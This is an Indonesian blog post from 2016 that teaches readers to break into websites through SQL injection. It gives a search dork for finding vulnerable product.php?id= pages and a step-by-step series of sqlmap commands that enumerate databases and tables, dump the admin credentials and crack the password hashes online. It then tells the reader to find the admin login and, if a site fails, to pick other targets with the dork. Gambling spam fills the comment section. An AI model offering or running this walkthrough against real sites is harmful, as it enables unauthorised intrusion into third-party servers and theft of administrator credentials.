Tuesday, 5 January 2016


Assalamualaikum Wr Wb

Kembali Lagi Di HardGhost Security,Oke Admin Kali Ini Akan Share Tentang Hacking Web Server.

Metode Hacking Nya Adalah Sql Injection,Dan Tahukah Sobat? 70% Situs Di Dunia Di Retas Dengan
Metode Sql Injection.
Sehingga Metode Ini Sangat Banyak Di Pakai Oleh Para Hacker.
Cara Kerja Sql Injection Ini Memanfaat kan kesalahan syntax di Database Server tsb.
Dengan Menginput query Untuk Menampilkan Isi Dari Database Target tsb.

Oke Lanjut ke Langkah Nya:

Dork:
inurl : product.php?id=
atau dork bisa di kembangkan lagi

1.Buka Terminal Dan Ketikan Perintah:
 sqlmap -u urltarget.com/product.php?id=77 --dbs

2.Jika Ada Pesan Tekan Y saja.

3.tunggu sampai selesai,Jika muncul Info Dengan Tulisan Berwarna Hijau Terang,Kemungkinan Berhasil
menembus Database Tsb,Sebalik Nya jika muncul Banyak Pesan Berwarna Merah/Kuning Kemungkinan Gagal.

4.Nah Jika Ada Pesan GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
Pilih N saja untuk mempercepat.

5.Tunggu Lagi Karna Sedang Proses Fetching Db,Jika Sudah Selesai Maka Database Telah di Tembus :D

6.Ketik Di Terminal.
sqlmap -u target/php.?id=4 -d nama database --tables

7.Tunggu Sebentar Dan Violaa Tabel Di Temukan :D

8.Cari Tabel berhubungan dengan admin karna situs yang saya gunakan tidak ada tabel admin jadi maaf tidak ada foto untuk seterus nya ,, ketik:
 sqlmap -u target.com/php.id?=4 -d nama database -t tabel --columns

9.Jika Selesai Mencari Kolom Nya lanjut dengan:
sqlmap -u target/php.?id=4 -d nama database -t admin --dump

10.dan informasi admin telah di temukan :D Jika Kolom Password nya Isi nya password aneh misal
5cd66cb6efx6g6nd6 atau gimana masuk ke hashkiller.co.uk untuk melihat password asli nya.

11.Jika sudah selanjutnya cari admin login nya (y)

Oke Sudah Bisa kan? Jika Situs Tidak Vuln Tinggal Cari lagi menggunakan dork tadi.
atau lihat video saya di sini:

Ya Hanya Itu Saja Yang Bisa Saya Berikan Semoga Bermanfaat :)

Offensive Say "Try Harder".

Wassalamualaikum Wr Wb

Author: Hardian Alkori

14 comments:

  1. I wish more authors of this type of content would take the time you did to research and write so well. I am very impressed with your vision and insight. togel

    ReplyDelete
  2. I have seen some great stuff here. Worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website. Your work is truly appreciated around the clock and the globe. situs poker terpercaya

    ReplyDelete
  3. Really I enjoy your site with effective and useful information. It is included very nice post with a lot of our resources.thanks for share. i enjoy this post.emasbola.com

    ReplyDelete
  4. What a fantabulous post this has been. Never seen this kind of useful post. I am grateful to you and expect more number of posts like these. Thank you very much. แทงบอลออนไลน์

    ReplyDelete
  5. Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! 파워볼사이트

    ReplyDelete
  6. I wanted to thank you for this excellent read!! I definitely loved every little bit of it. I have you bookmarked your site to check out the new stuff you post. Fafa855

    ReplyDelete
  7. The post is written in very a good manner and it contains many useful information for me. ไพ่เสือมังกร

    ReplyDelete
  8. Superior post, keep up with this exceptional work. It's nice to know that this topic is being also covered on this web site so cheers for taking the time to discuss this! Thanks again and again! แทงมวย

    ReplyDelete
  9. thanks for this usefull article, waiting for this article like this again. Agen Bandar QQ Online

    ReplyDelete
  10. Leadership Is More Who You Are Than What You Do. Pkv Games Online Terpercaya

    ReplyDelete
  11. Superbly written article, if only all bloggers offered the same content as you, the internet would be a far better place.. ufabet

    ReplyDelete
  12. I like your blog,I sincerely hope that your blog a rapid increase in
    traffic density,which help promote your blog and we hope that your blog is being updated.
    ทางเข้า ยูเพลย์365

    ReplyDelete

About Me

My Photo
Bekasi, Jawa Barat, Indonesia
HardGhost Security Blog Yang Membahas Tentang Programming,Networking Dan Securitty.
HardGhost Security 2016. Powered by Blogger.

Quote

Think Big Thoughts,But Relish Small Pleasure

Theme Support

BTricks

Video Pentesting

Popular Posts

Our Facebook Page